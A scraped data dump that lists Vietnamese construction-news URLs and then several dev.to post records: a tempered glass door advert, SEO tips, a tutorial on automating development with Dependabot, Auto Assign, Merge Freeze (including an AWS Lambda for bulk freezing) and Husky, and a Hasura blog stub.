http://antt.vn/dau-gia-mo-vat-lieu-xay-dung-o-ha-tinh-tu-lenh-nganh-ly-giai-nguyen-nhan-cham-tre-304856.htm
https://reatimes.vn/ban-tin-bds-24h-dung-co-che-dat-hang-xay-nha-o-thuong-mai-1608970442871.html
https://baodansinh.vn/hon-17000-ho-ngheo-khu-vuc-mien-trung-duoc-ho-tro-xay-nha-tranh-bao-lu-96876.htm
https://baodongkhoi.vn/gop-cong-xay-nha-cho-thuong-binh-07112010-a9695.html
http://hatinh24h.com.vn/doanh-nghiep-lan-bien-xay-nha-hang-trai-phep-tai-ha-tinh-sai-pham-cong-khai-xu-ly-i-ach-a102148.html
http://baoyenbai.com.vn/11/57934/Khoi_cong_xay_Nha_Quoc_hoi.aspx
http://nguoihanoi.com.vn/vi-sao-dan-bac-lieu-dua-xay-nha-lau-nuoi-chim-yen-giua-tp_236799.html
https://daklak24h.com.vn/tin-kinh-te/45123/quan-ly-do-thi-xay-nha-nuoi-chim-yen-trong-do-thi-co-quan-chuc-nang-lung-tung.html
http://baobinhduong.vn/tuot-thang-may-van-chuyen-vat-lieu-xay-dung-mot-cong-nhan-nguy-kich-a104020.html
https://reatimes.vn/nganh-vat-lieu-xay-dung-2019-buc-tranh-nhieu-sac-mau-32331.html
https://baodansinh.vn/geleximco-muon-xay-nha-may-nhiet-dien-ty-usd-voi-doi-tac-trung-quoc-71927.htm
https://www.bienphong.com.vn/khanh-thanh-xay-nha-chong-lu-tai-thanh-hoa-post19757.html
https://reatimes.vn/tphcm-trong-2-nam-toi-se-khong-xay-nha-cao-tang-tai-quan-1-va-quan-3-26786.html
https://daklak24h.com.vn/xa-hoi/27397/huyen-krong-pac-no-luc-hoan-thanh-chi-tieu-xay-nha-167.html
https://reatimes.vn/bat-dong-san-24h-tphcm-hoc-tap-binh-duong-xay-nha-cho-cong-nhan-gia-100-trieu-dong-1691.html
https://baodansinh.vn/ca-si-thuy-tien-se-xay-nha-cong-dong-tranh-lu-mua-thuyen-cuu-ho-trong-nha-cho-ca-thon-20201025095002174.htm
http://thanhhoa24h.net.vn/nguoi-dan-khanh-hoa-xay-nha-nuoi-ong-du-tranh-bao-a96418.html
http://baoyenbai.com.vn/12/97288/Bo_quy_dinh_cam_xay_nha_nhai_kien_truc_kieu_Phap.aspx
https://reatimes.vn/go-kho-the-nao-cho-vat-lieu-xay-dung-xanh-27929.html
https://giaoducthoidai.vn/phap-luat/gia-dinh-can-bo-quan-thu-duc-tphcm-xay-nha-trai-phep-xu-ly-nghiem-khong-co-vung-cam-3826807.html
https://baodansinh.vn/ubnd-tp-hue-dat-da-duyet-du-an-van-cap-phep-cho-nguoi-dan-xay-nha-44714.htm
http://baolangson.vn/xa-hoi/45134-xay-nha-trai-phep-trong-chua-quan-am-tu-quang-binh.html
https://baoquangbinh.vn/kinh-te/202103/toan-tinh-hien-co-72-doanh-nghiep-san-xuat-vat-lieu-xay-dung-2186386/
http://baobinhduong.vn/doi-bong-chuyen-vat-lieu-xay-dung-binh-duong-dat-chi-tieu-tru-hang-doi-manh-2019-a194576.html
http://thanhnienviet.vn/2020/09/22/tong-hop-kinh-nghiem-chon-vat-lieu-xay-nha-ben-chac-tiet-kiem-chi-phi/
https://baotayninh.vn/can-quan-ly-nghiem-viec-xay-nha-nuoi-chim-yen-a124741.html
https://reatimes.vn/doanh-nghiep-co-von-nuoc-ngoai-thue-dat-xay-nha-co-duoc-phep-ban-360.html
https://baodansinh.vn/ubnd-phuong-van-quan-chiem-dat-xay-nha-van-hoa-42916.htm
https://reatimes.vn/san-xuat-vat-lieu-xay-dung-khong-nung-tu-tro-xi-can-be-do-chinh-sach-26794.html
https://baotayninh.vn/siet-chat-viec-cap-giay-phep-xay-nha-tam-a51937.html
http://baoyenbai.com.vn/17/114796/Tu_19_xay_nha_tu_7_tang_phai_bao_cao_So_Xay_dung.aspx
http://baolangson.vn/quoc-te/99714-nga-giup-viet-nam-xay-nha-may-dien-hat-nhan.html
https://baodongkhoi.vn/be-mac-giai-bong-chuyen-bai-cat-tinh-ben-tre-tranh-cup-vat-lieu-xay-dung-lan-thu-iii-nam-2011-01062011-a4044.html
http://nghean24h.vn/cam-tien-theo-trai-vao-nghe-an-xay-nha-vo-ho-ra-di-tay-trang-con-bi-bat-chiu-tien-an-hoi-de-gat-no-a570184.html
https://tieudungplus.vn/ban-tin-bds-24h-dung-co-che-dat-hang-xay-nha-o-thuong-mai-1608970442871.html
http://baoyenbai.com.vn/18/115231/LHQ_de_xuat_giam_sat_nhap_khau_vat_lieu_xay_dung_vao_Gaza.aspx
https://reatimes.vn/hoa-chat-nano-duoc-su-dung-trong-chong-chay-cho-vat-lieu-xay-dung-1606296818126.html
http://nghean24h.vn/nghe-an-chinh-quyen-lam-ngo-truoc-tinh-trang-xay-nha-kien-co-tren-dat-ven-bien-a537136.html
https://www.bienphong.com.vn/len-lut-xay-nha-cho-du-an-tiem-an-nguy-co-mat-an-ninh-trat-tu-post338349.html
http://thanhhoa24h.net.vn/tphcm-muon-xay-nha-hat-1500-ty-chua-nen-voi-a129984.html
https://baotuyenquang.com.vn/kinh-te/cong-nghiep-ha-tang/san-xuat-vat-lieu-xay-dung-giai-doan-2015-2020!-62777.html
http://thanhnienviet.vn/2021/02/22/gia-chu-soc-trang-xay-nha-de-chiu-nhu-resort-tren-manh-dat-vua-hep-vua-dai/
http://antt.vn/cap-so-do-xay-nha-tren-cong-thoat-nuoc-298173.htm
http://danang24h.vn/da-co-kinh-cuong-luc-gorilla-glass-the-he-5-sieu-ben-a72522.html
https://reatimes.vn/doanh-nghiep-vat-lieu-xay-dung-ong-lon-di-lui-27558.html
https://baodansinh.vn/vingroup-sap-xay-nha-may-duoc-pham-tai-bac-ninh-72134.htm
https://baolongan.vn/trao-tang-tien-xay-nha-tinh-thuong-cho-cuu-chien-binh-a40407.html
https://baothuathienhue.vn/vat-lieu-xay-dung-dan-dau-bang-xep-hang-tang-truong-pmi-nganh-cua-chau-a-a60174.html
https://baotayninh.vn/1-000-ty-dong-xay-nha-lam-viec-cac-co-quan-quoc-hoi-a19983.html
http://danang24h.vn/hai-nguoi-bi-vat-lieu-xay-dung-de-chet-thuong-tam-a120942.html
http://hatinh24h.com.vn/xay-nha-sieu-cao-tang-se-de-bep-nha-phap-co-ga-ha-noi-a74510.html
http://baoquangtri.vn/Thoi-su/modid/445/ItemID/74514/title/Bao-Thanh-Nien-xay-nha-nhan-ai-va-cuu-tro-tai-Quang-Tri-
http://baoquangtri.vn/Van-hoa-The-thao/modid/421/ItemID/106700/title/Lang-hai-mo-hoi-xay-nha-cho-dan-ngheo-
https://baotuyenquang.com.vn/phong-su/hien-dat-xay-nha-van-hoa-o-khuon-ha-87580.html
https://baolongan.vn/van-dong-ung-ho-xay-nha-dai-doan-ket-tren-huyen-dao-truong-sa-a52996.html
https://www.bienphong.com.vn/don-bp-ckqt-cau-treo-xay-nha-huu-nghi-cho-ho-ngheo-tai-lao-post3360.html
https://reatimes.vn/xay-nha-moi-can-tuan-thu-nguyen-tac-phong-thuy-nao-198.html
http://baolangson.vn/quoc-te/99955-i-xra-en-cong-bo-ke-hoach-xay-nha-dinh-cu-moi-gan-dong-gie-ru-xa-lem.html
http://antt.vn/dai-gia-xay-nha-san-go-lim-hon-200-ty-o-dien-bien-la-ai-2355.htm
https://baotayninh.vn/xay-nha-tuong-niem-bac-ho-tai-truong-sa-a18883.html
http://baolangson.vn/the-thao/the-thao-trong-nuoc/319523-giai-golf-tu-thien-xay-nha-tinh-nghia-va-giup-do-dong-bao-mien-trung.html
https://baodansinh.vn/ho-ngheo-xay-nha-o-duoc-ho-tro-the-nao-94364.htm
https://baodansinh.vn/khanh-hoa-trao-265-trieu-dong-ho-tro-doan-vien-xay-nha-mai-am-20191104170037671.htm
http://thanhnienviet.vn/2020/11/14/cong-lung-vi-1-phut-si-dien-muon-xay-nha-to-ra-o-rieng/
https://tieudungplus.vn/bds-24h-du-thao-nghi-dinh-quan-ly-vat-lieu-xay-dung-phai-gan-lien-voi-thuc-te-1602916282838.html
https://nguoidothi.net.vn/tranh-luan-viec-xay-nha-hat-giao-huong-o-thu-thiem-16058.html
http://thanhnienviet.vn/2020/09/12/lan-dau-tien-mot-thuong-hieu-san-xuat-vat-lieu-xay-dung-dat-set-nung-viet-nam-lap-cu-dup-ky-luc-the-gioi/
https://giaoducthoidai.vn/gia-dinh/nguoi-dan-ong-nga-xay-nha-tren-cay-cua-hang-xom-khi-ho-di-nghi-3757877.html
http://thanhhoa24h.net.vn/nguyen-chu-tich-mat-tran-to-quoc-tinh-xay-nha-trai-phep-tren-nui-a160057.html
http://baobinhduong.vn/giai-bong-chuyen-tre-cup-clb-toan-quoc-2019-tre-vat-lieu-xay-dung-binh-duong-ra-quan-an-tuong-a206782.html
http://baolangson.vn/xa-hoi/42846-ho-tro-nguoi-dan-xay-nha-luu-tru-cho-cong-nhan.html
https://baodansinh.vn/hoa-phat-bien-xi-hat-lo-cao-thanh-vat-lieu-xay-dung-bao-ve-moi-truong-83064.htm
http://baoyenbai.com.vn/12/123296/Tap_doan_Han_Quoc_xay_nha_may_angten_khong_day_tai_Ha_Nam.aspx
http://danang24h.vn/tu-15-8-xay-nha-phai-ky-cam-ket-dam-bao-an-toan-cho-hang-xom-a37138.html
http://hatinh24h.com.vn/chay-kho-vat-lieu-xay-dung-nhieu-nguoi-chay-tan-loan-a104533.html
https://baodansinh.vn/thua-thien-hue-bo-sung-gan-39-ty-dong-ho-tro-xay-nha-o-cho-nguoi-co-cong-voi-cach-mang-20200829093057066.htm
https://baoangiang.com.vn/ma-tran-thi-truong-kinh-cuong-luc-a255236.html
http://baolangson.vn/khoa-hoc-tin-hoc/228150-nghien-cuu-su-dung-tro-xi-cua-nha-may-nhiet-dien-na-duong-lam-mat-duong-giao-thong-nong-thon-thay-the-vat-lieu-xay-dung-gop-phan-bao-ve-moi-truong.html
https://giaoducthoidai.vn/ket-noi/xay-nha-ve-sinh-truong-hoc-tu-chat-lieu-gach-sinh-thai-lJV9mYUGR.html
https://baotayninh.vn/xay-nha-khong-phep-bi-lang-gieng-phan-ung-a85151.html
http://baoquangtri.vn/Xa-hoi/modid/420/ItemID/133991/title/Ho-tro-hoi-vien-phu-nu-ngheo-xay-nha-ve-sinh
http://thanhnienviet.vn/2020/10/10/roi-sai-gon-ra-da-nang-cap-vo-chong-mua-dat-xay-nha-3-tang-dep-nhu-resort/
https://reatimes.vn/ly-giai-su-tang-gia-vat-lieu-xay-dung-o-metro-manila-2753.html
https://giaoducthoidai.vn/chuyen-la/xay-nha-vuong-cay-co-thu-tram-tuoi-gia-dinh-quyet-dinh-lam-mot-viec-khien-ai-di-qua-cung-phai-nguoc-nhin-3804078.html
http://baoyenbai.com.vn/12/39196/Gia_vat_lieu_xay_dung_tang_cac_nha_thau_lao_dao.aspx
https://nguoidothi.net.vn/bac-bo-y-tuong-xay-nha-gia-re-25m2-o-tp-hcm-7590.html
https://baothuathienhue.vn/bao-thua-thien-hue-gop-suc-xay-nha-tinh-nghia-cho-ho-ngheo-o-khanh-hoa-a41376.html
http://baobinhduong.vn/xa-phu-an-thi-xa-ben-cat-khoi-cong-xay-nha-nhan-ai-a100980.html
https://reatimes.vn/phat-trien-vat-lieu-xay-dung-xanh-can-co-che-ro-rang-35549.html
https://baolongan.vn/xay-nha-bi-nghieng-mat-long-hang-xom-a69250.html
https://baolongan.vn/doan-thanh-nien-ho-tro-xay-nha-va-tang-qua-cho-nguoi-ngheo-a41668.html
https://reatimes.vn/them-sieu-thi-vat-lieu-xay-dung-tai-tp-ho-chi-minh-202327.html
https://baotayninh.vn/israel-cho-phep-chuyen-vat-lieu-xay-dung-vao-dai-gaza-a61303.html
https://reatimes.vn/can-danh-thue-cao-dat-xay-nha-o-nhung-bo-hoang-20200112143950928.html
https://baolongan.vn/de-xuat-lap-ho-thanh-cong-de-xay-nha-tai-dinh-cu-a35482.html
https://reatimes.vn/ca-thon-xay-nha-khong-so-do-vi-co-che-la-lung-459.html
https://baotuyenquang.com.vn/kinh-te/cong-nghiep-ha-tang/day-manh-phat-trien-cong-nghiep-che-bien-vat-lieu-xay-dung-co-khi-128698.html
https://reatimes.vn/vat-lieu-xay-dung-khong-nung-kho-canh-tranh-tren-thi-truong-20200515101926927.html
https://www.bienphong.com.vn/10-ngu-dan-mien-trung-co-hoan-canh-kho-khan-duoc-ho-tro-tien-xay-nha-post16069.html
https://giaoducthoidai.vn/thoi-su/chu-tich-da-nang-neu-tuong-ca-xay-nha-trai-phep-xu-khong-vuong-ban--484509.html
http://baolangson.vn/xa-hoi/34988-tra-vinh-chu-trong-cong-tac-xay-nha-o-cho-cong-nhan-va-cham-soc-nguoi-ngheo.html
http://thanhnienviet.vn/2020/09/28/nha-lech-tang-la-gi-co-nen-xay-nha-lech-tang-hay-khong/
| kinhennho |
709,021 | Beautiful tempered glass door models, updated June 2021 | Swing tempered glass doors with floor hinges. Swing tempered glass doors, also known as floor-hinge glass doors... | 0 | 2021-05-26T10:10:12 | https://dev.to/kinhennho/cac-m-u-c-a-kinh-c-ng-l-c-d-p-c-p-nh-p-t6-2021-3ci3 | cuakinhcuongluc |
Swing tempered glass doors with floor hinges
Swing tempered glass doors are also known as floor-hinge doors or hydraulic glass doors. Because they are made of tempered glass, these doors are highly durable and rarely break down, which makes them the most widely used door type on the market today.
There are two main types, single-leaf and double-leaf, fitted with VVP floor hinges from Thailand or other premium options such as Adler (Germany — genuine parts with a warranty of up to 24 months and SMS code verification), Huy Hoang hardware made in Vietnam (genuine warranty of up to 24 months), or imported premium Hafele hinges.
Floor-hinge tempered glass doors mounted on an aluminum clamp base are the most common type. Other frame options include:
Steel-frame tempered glass doors: made with 40×80 box steel, spray-painted, for a solid and secure build.
Aluminum-frame tempered glass doors: made with Viet Phap 4500-series or Xingfa-series aluminum, for better aesthetics and greater safety.
Sliding tempered glass doors
Hanging sliding doors overcome some of the space limitations of swing doors, which need clearance to open.
Sliding glass doors come in a few main types: D25, 10×30 stainless-steel sliding (usually used for shower cabins), aluminum-rail sliding, and the Jamilldoor system.
The D25 sliding door is the most widely used type thanks to its stable quality and good price, while the Jamilldoor system is the most durable and solid but suits fewer buyers because of its relatively high price.
How much does a tempered glass door cost per m²?
Hydraulic and tempered glass door prices currently range from 430,000 VND to 530,000 VND per m² for 10mm and 12mm tempered glass.
Tempered glass door price = price per m² of tempered glass + price of the door hardware
Source: https://kinhennho.com/cua-kinh-cuong-luc/ | kinhennho |
709,056 | 6 Amazing Tips To Boost Your SEO | While there is a lot of SEO advice and tips out there, most don’t deliver desirable results. And some... | 0 | 2021-05-26T10:56:59 | https://dev.to/raymondhalliwell/6-amazing-tips-to-boost-your-seo-38ee | digitalmarketing, raymondhalliwell, seo, socialmediamarketing | While there is a lot of SEO advice and tips out there, most don’t deliver desirable results. Some are already outdated and no longer seem to work with Google’s constantly changing algorithm. With an abundance of tips and tricks flooding the internet, choosing the right ones can be challenging. That is why [Raymond Halliwell](https://twitter.com/raymondhalliwel), a digital marketing expert, shares actionable SEO tips that have proven to improve organic rankings without getting penalized. It’s time to let go of the tips that aren’t working and embrace the ones that will actually improve your search rankings.
##Add relevant subtopics to existing contents##
It is easy to miss essential points in a first draft that could have improved your page's rank in search engines. Keywords may rank lower because of missing subtopics, which leads to less visibility for your site. Identify the relevant subtopics and include the major keywords in them to improve your ranking.
##Add backlinks from one page on your site to another##
These are links from one page on your site to another that give visitors easy navigation. To increase your site's ranking, add more internal links between your pages. Search for relevant linking opportunities on your high-authority pages and link them to the page you want to boost. You can do this by searching for your website's URL together with the keyword you are targeting. If there are many candidate pages, filter them and prioritize the ones with the highest authority.
##Check for competing Backlinks that undermine and decrease the performance of your content##
There is room for improvement if your keyword is not yet ranked number one. Check the current ranking first with a SERP checker. Competing backlinks can push your site's ranking back when rival pages have many more referring domains. Look for areas where your page beats the competition and build on that content. That is, find pages with fewer views, reach out to their owners, and ask them to link to your page to improve traffic and visibility.
##Revamp your blog posts as video content##
As individuals, we are different and we have different preferences. This also applies to the content we view on the internet. Different people prefer different content formats, so you should find out which format your audience prefers and tailor your content to your target audience's needs. Many people prefer video, so you can convert your blog posts to videos, or embed videos related to the topics and keywords people search for most on YouTube, to reach a wider audience. This will level up your ranking on the Google search engine.
##Check and fix pages that have broken backlinks##
Backlinks that lead to dead pages are useless for SEO. Those pages no longer exist, nor do they help your active pages rank. To find broken backlinks, filter for error 404 pages in a Link report; if such pages still have referring domains, their backlinks are broken.
Broken backlinks can be fixed by:
1. Reinstating dead pages deleted by mistake.
2. Redirecting a URL of dead pages to new URLs or redirect nonexistent dead pages with a similar page to the old URL.
3. Requesting a link change. Only fix dead pages with high-quality backlinks and leave the rest at 404. To check whether a page's backlinks are of good quality, go to the Backlinks report.
##Convert custom-made infographics, illustrations, images, etc into backlinks##
Others might use these images in their content and link back to the image file instead of the page it lives on (the source link). To check whether people are using your images without proper linking, go to any image on your website, right-click it, then choose the "Search Google for image" option from the menu. You can also copy and paste your website's link into Site Explorer. For this, click on the Backlinks report, look for backlink URLs containing .jpg or .png, and you will see the sites that have linked to your images instead of your pages.
###Conclusion###
We hope these tips from Raymond Halliwell help you in your SEO journey. The good thing is that they don't take much time and can be implemented in a few hours. With these, watch your website's pages rank high in no time.
_Originally published at [getjoys.net](https://getjoys.net/technology/tips-to-boost-seo/)_ | raymondhalliwell |
710,330 | 5 tools to automate your development | Automating your development with Dependabot, Auto Assign, Merge Freeze, Husky and Scheduled... | 0 | 2021-08-27T12:43:48 | https://dev.to/pgarzina/5-tools-to-automate-your-development-3m | productivity, github, devops | Automating your development with Dependabot, Auto Assign, Merge Freeze, Husky and Scheduled reminders.
The idea of this post is to introduce some of the tools and integrations that made our development life easier.
Most of these are pretty straightforward to implement into your workflow but for the ones that have a couple of gotchas I might write an extended introductory version for that tool alone.
## 1. Dependabot
### *Automated dependency updates*
*Dependabot creates pull requests to keep your dependencies secure and up-to-date.*
[Dependabot](https://dependabot.com/) is dead simple and their punchline clearly states what it does. We started using it a couple of years back, a bit before [Github acquired it](https://dependabot.com/blog/hello-github/).
The main reason was that, at the time our current team took over the Front End division, there were a lot of outdated dependencies which we wanted to update and wanted to keep up to date. We found Dependabot, added it to our projects, and let it do its magic ever since.
Now it's natively a part of Github, so adding it is even easier than before. You can [check out](https://docs.github.com/en/code-security/supply-chain-security/keeping-your-dependencies-updated-automatically) how to set up Dependabot; either way, you'll end up with a `dependabot.yml` in your `.github` folder.
Ours looks like this:
``` yml
version: 2
updates:
- package-ecosystem: "npm" # See documentation for possible values
directory: "/" # Location of package manifests
schedule:
interval: "daily"
open-pull-requests-limit: 2
commit-message:
prefix: "BleedingEdge"
```
The only thing that differs from the default settings is that we:
- chose npm as our package-ecosystem
- limited the number of open PRs to 2
- added a prefix for Dependabot's default commit message (you'll see later why)
Four years back we had 3 frontend repos, now we have around 14 active ones. Manually keeping every dependency up to date would be extremely time consuming. Dependabot helps a lot, but it still takes time to review and merge all the PR's. We usually take a day, after our weekly release, to merge Dependabot's pull requests.
*Writing this got me wondering if we could set the bot to open PRs only on major, minor or patch versions, and indeed the feature [was requested in 2018](https://github.com/dependabot/dependabot-core/issues/2219) and was released a few months ago, so now you can ignore SemVer updates of your choice. Check out [GitHub's blog post](https://github.blog/changelog/2021-05-21-dependabot-version-updates-can-now-ignore-major-minor-patch-releases/) for more.*
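For anyone wanting to try that, a minimal sketch of such an `ignore` configuration could look like this (values are illustrative; check GitHub's docs for the full syntax):

``` yml
version: 2
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "daily"
    ignore:
      # Skip PRs for major version bumps; still get minor and patch updates
      - dependency-name: "*"
        update-types: ["version-update:semver-major"]
```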
## 2. Auto Assign
### *Add reviewers/assignees to pull requests when pull requests are opened.*
So you opened a pull request, you need at least two approvals and you need to add reviewers to your pull request. Every single time.
Things are pretty obvious, let the bot do it.
Setting it up is easy: go to [probot.github.io/apps/auto-assign](https://probot.github.io/apps/auto-assign/), hit the Add to GitHub button, and don't ever worry about manually adding reviewers!
Similar to Dependabot, you will end up with an `auto_assign.yml` file:
```yml
# Set to true to add reviewers to pull requests
addReviewers: true
# Set to true to add assignees to pull requests
addAssignees: false
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
- teammember1
- teammember2
- teammember3
- ...
# A number of reviewers added to the pull request
# Set 0 to add all the reviewers (default: 0)
numberOfReviewers: 0
# A list of keywords to be skipped the process that add reviewers if pull requests include it
skipKeywords:
- BleedingEdge
```
We have nothing out of the ordinary here. We are utilizing the *skipKeywords* option with the *BleedingEdge* keyword which, if you remember, Dependabot prefixes to each of its commit messages. We handle the pull requests Dependabot opens a little bit differently and don't want to burden all the reviewers with them.
Once the pull request is opened, the bot kicks in and you see it in the timeline requesting reviews:

*You can also try and use the default settings Github provides for Code Review Assignments. Just go to your team page, in the top right hit Settings and you'll find the Code review assignments tab. We tried it but it didn't work out for us.*
## 3. Merge Freeze
### *The code freeze tool to block merging and deployments*
The reason for adding merge freeze originated from a simple question:
> *Can you tell all the developers to stop merging since we are starting regression?*
We could announce it in our team's channel in hopes that everyone reads the message in time. Or we could integrate a tool that allows the QA team to issue a command on Slack that freezes/unfreezes merging to the repository. [Merge Freeze](https://www.mergefreeze.com/) to the rescue.
Again, setting it up is nothing too complex. What we did find Merge Freeze is missing is the ability to bulk freeze. It worked well when we needed to freeze a couple of repos. But once the number of our repositories increased to over 10, manually entering the command more than 10 times... you get it.
For this we used [Slack Apps](https://slack.com/apps) and [AWS Lambda](https://aws.amazon.com/lambda/).
We created a custom Slack App for our workspace called Deployment, that has two Slash commands: `/freeze_all` and `/unfreeze_all`. Both commands have the Request URL set to our Lambda url, and pass the freeze value as a query parameter: `?freeze=true | false`.
Using it on Slack looks like this:

The Merge Freeze tool exposes an API endpoint for each repository you add to it, which you can use to freeze or unfreeze it. That makes the Lambda rather simple, it just makes a POST request to each of the endpoints provided by MergeFreeze.
```javascript
const https = require('https');

exports.handler = async (event) => {
  const freezeValue = getFreezeValue(event);

  if (!freezeValue) {
    return {
      statusCode: 400,
      body: JSON.stringify('BOOM! You need to provide a freeze value as a query param, either true or false'),
    };
  }

  const userName = getUserName(event);

  const baseOptions = {
    hostname: 'mergefreeze.com',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': 0,
    },
  };

  const appOneOptions = {
    path: `/api/branches/your-organization/your-repo/main/?access_token=${process.env.ACCESS_TOKEN}&frozen=${freezeValue}&user_name=${userName}`,
    ...baseOptions,
  };

  ...
  /** Removed the rest of the declarations to keep the preview short */

  await Promise.all([
    doRequest(appOneOptions),
    ...
    doRequest(appElevenOptions),
  ]);

  console.log("I'm done with all your promises!");

  // Text that gets returned to Slack, visible only to the person entering the command
  return {
    statusCode: 200,
    body: JSON.stringify('You have such power!!!'),
  };

  function doRequest(options) {
    return new Promise((resolve, reject) => {
      const req = https.request(options, (res) => {
        res.setEncoding('utf8');
        let responseBody = '';

        res.on('data', (chunk) => responseBody += chunk);
        res.on('end', () => resolve(responseBody));
      });

      req.on('error', (err) => reject(err));
      req.end();
    });
  }

  function getFreezeValue(event) {
    let freezeQueryString;
    let freeze;

    if (event && event.queryStringParameters && event.queryStringParameters.freeze) {
      freezeQueryString = event.queryStringParameters.freeze;
    }

    if (freezeQueryString === 'true' || freezeQueryString === 'false') {
      freeze = freezeQueryString;
    }

    return freeze;
  }

  function getUserName(event) {
    const bodyQueryParams = new URLSearchParams(event.body);
    return bodyQueryParams.get('user_name') || 'Web API';
  }
};
```
After entering the command, MergeFreeze lists all the repos that got frozen or unfrozen and you get a confirmation message from Slack, making your work day a bit better!

After the regression is done, everything is pushed to Production and is smoke tested, the lead QA issues the `unfreeze_all` command and life goes on.
## 4. Husky
### *Modern native Git hooks made easy*
We use Jira as our work management tool, so we have to prepend the ticket ID to our branch names and commit messages in order to utilize both the Development panel when viewing an issue and VS Code's GitLens extension:
Jira ticket Development panel:

This means that each time you create a branch you have to remember to include the Jira issue ID, e.g. task-**ND-123**-add-authentication. That alone was not a big deal as it quickly became a habit. But what was a PIA was prepending it to every commit message. The first automation round was just setting up the git `prepare-commit-msg` hook on your local machine, but as the team grew larger we needed a better solution, which Husky provided!
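For context, a local `prepare-commit-msg` hook along those lines might have looked something like this. This is a simplified sketch, not the exact script we used, and the ticket pattern here is deliberately simpler than the one in our config:

``` bash
#!/bin/sh
# Sketch of a local .git/hooks/prepare-commit-msg hook (pre-Husky approach).
# Pulls a Jira-style ticket ID (e.g. ND-123) out of the branch name and
# prepends it to the commit message if it's not there yet.

extract_ticket() {
  # First Jira-style ID (UPPERCASE-digits) found in the argument, if any
  echo "$1" | grep -oE '[A-Z]+-[0-9]+' | head -n 1
}

MSG_FILE="$1"   # git passes the commit-message file path as $1
if [ -n "$MSG_FILE" ] && [ -f "$MSG_FILE" ]; then
  TICKET=$(extract_ticket "$(git rev-parse --abbrev-ref HEAD)")
  if [ -n "$TICKET" ] && ! grep -q "$TICKET" "$MSG_FILE"; then
    printf '%s %s' "$TICKET" "$(cat "$MSG_FILE")" > "$MSG_FILE"
  fi
fi
```

The obvious downside, as mentioned, is that every developer has to install this by hand, which is exactly what Husky solved for us.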
[Husky](https://typicode.github.io/husky) in combination with [jira-prepare-commit-msg](https://github.com/bk201-/jira-prepare-commit-msg) is what worked for us:
```json
...
"private": true,
"husky": {
"hooks": {
"prepare-commit-msg": "jira-prepare-commit-msg"
}
},
"jira-prepare-commit-msg": {
"messagePattern": "$J $M",
"jiraTicketPattern": "(\\w+-\\w+-\\d+)"
},
"dependencies": {
...
"devDependencies": {
"husky": "^4.3.8",
"jira-prepare-commit-msg": "^1.5.2",
...
```
The Jira ticket ID is taken from the git branch name. Now you could just write `git commit -m "Fixing a typo"` and you would get a commit message looking like *task-ND-123 Fixing a typo*.
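To illustrate what the `jiraTicketPattern` from the config above actually matches, here's a small standalone sketch (not the plugin's real implementation):

```javascript
// The pattern from the config above matches e.g. "task-ND-123" in a branch name
const jiraTicketPattern = /(\w+-\w+-\d+)/;

function ticketFromBranch(branchName) {
  const match = branchName.match(jiraTicketPattern);
  return match ? match[1] : null;
}

console.log(ticketFromBranch('task-ND-123-add-authentication')); // task-ND-123
console.log(ticketFromBranch('main')); // null
```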
In case you did not name your branch correctly, e.g. a missing Jira ticket ID, you would get an error:
``` bash
my-application git:(main) ✗ git commit -m "Add authentication methods"
husky > prepare-commit-msg (node v14.15.0)
JIRA prepare commit msg > start
JIRA prepare commit msg > Error: The JIRA ticket ID not found
JIRA prepare commit msg > done
```
This came in nicely as everything was set up in `package.json`: a new developer just runs `npm i` and is pretty much set, no need to manually configure hooks.
But the Jira Ticket ID in the commit message in combination with GitLens is what really made this super useful.
GitLens with Git blame annotations:

There were a lot of times where we had to, for various reasons, open up and read the Jira issue associated with a code change. Having the ticket ID at each mouse click throughout the codebase saved us a lot of time. (Opening it in the browser is easy as well: just take the Jira ID and add it after *.../browse/*, e.g. https://your-organization.atlassian.net/browse/ND-123)
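That URL construction can be wrapped in a tiny helper (the hostname is a placeholder, of course):

```javascript
// Hypothetical helper: turn a Jira ticket ID into a browse URL.
const JIRA_BASE_URL = 'https://your-organization.atlassian.net/browse/';

function jiraUrl(ticketId) {
  return `${JIRA_BASE_URL}${ticketId}`;
}

console.log(jiraUrl('ND-123'));
// https://your-organization.atlassian.net/browse/ND-123
```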
GitLens is a cool tool which I personally use on a daily basis. It helps you to visualize code authorship at a glance via Git blame annotations and code lens. You can also very easily navigate back in history to see past commits which is useful as well.
## 5. Scheduled reminders for Pull Requests
### *Scheduled reminders help teams focus on the most important review requests*
This is something we added not too long ago, just a bit after we moved to a Micro Frontend Architecture. One of the reasons for adding it was that the number of repositories increased from 4 to 14, so having a dedicated channel for open pull requests made sense. Prior to this we would post a link to the PR in our team's main channel, or hope people would see it in their email. This way we moved the noise to a dedicated channel, and the devs know the team will get notified automatically.

We get notifications every working day, each full hour from 8 to 16. It ignores approved pull requests (in our case, when 2+ people have approved) and we also have an ignore term for *BleedingEdge*, so it skips pull requests opened by Dependabot.
Setting up [scheduled reminders](https://docs.github.com/en/organizations/organizing-members-into-teams/managing-scheduled-reminders-for-your-team) is straightforward and you can find the GitHub docs [here](https://docs.github.com/en/github/setting-up-and-managing-your-github-user-account/managing-your-membership-in-organizations/managing-your-scheduled-reminders). This is how it looks once it's up; in our case it posts messages in a private *frontend-pull-requests* channel:

...
There are a lot of improvements that we could add on top of what we have; for instance, creating branches directly from Jira would ease having to remember the naming convention. Or maybe we could have chosen a merge freeze tool that has bulk freeze built in. But usually we had limited time for investigation, or the tool was good enough at the time, and later on we just tried to improve the process instead of replacing the tool.
If you have any suggestions, please do post them in the discussion below!
***
Feel free to connect 👋
[Twitter](https://twitter.com/pgarzina) | [Instagram](https://www.instagram.com/pgarzina/) | [LinkedIn](https://www.linkedin.com/in/petar-garzina/)
| pgarzina |
709,338 | Architecture & Authorization For A Complex Multi-Tenant SaaS Platform With Hasura | Prefect | by Zachary Hughes @HasuraCon'20 | Zachary Hughes spoke last year at HasuraCon'20 on how Prefect's complex multi-tenant architecture a... | 0 | 2021-05-27T08:50:21 | https://hasura.io/blog/architecture-authorization-multi-tenant-saas-platform-with-hasura-prefect/ | hasuracon | ---
title: Architecture & Authorization For A Complex Multi-Tenant SaaS Platform With Hasura | Prefect | by Zachary Hughes @HasuraCon'20
published: true
date: 2021-05-26 13:36:24 UTC
tags: HasuraCon
canonical_url: https://hasura.io/blog/architecture-authorization-multi-tenant-saas-platform-with-hasura-prefect/
---

_[Zachary Hughes](https://github.com/zdhughes) spoke last year at HasuraCon'20 on how Prefect's complex multi-tenant architecture and authorization is built with Hasura._
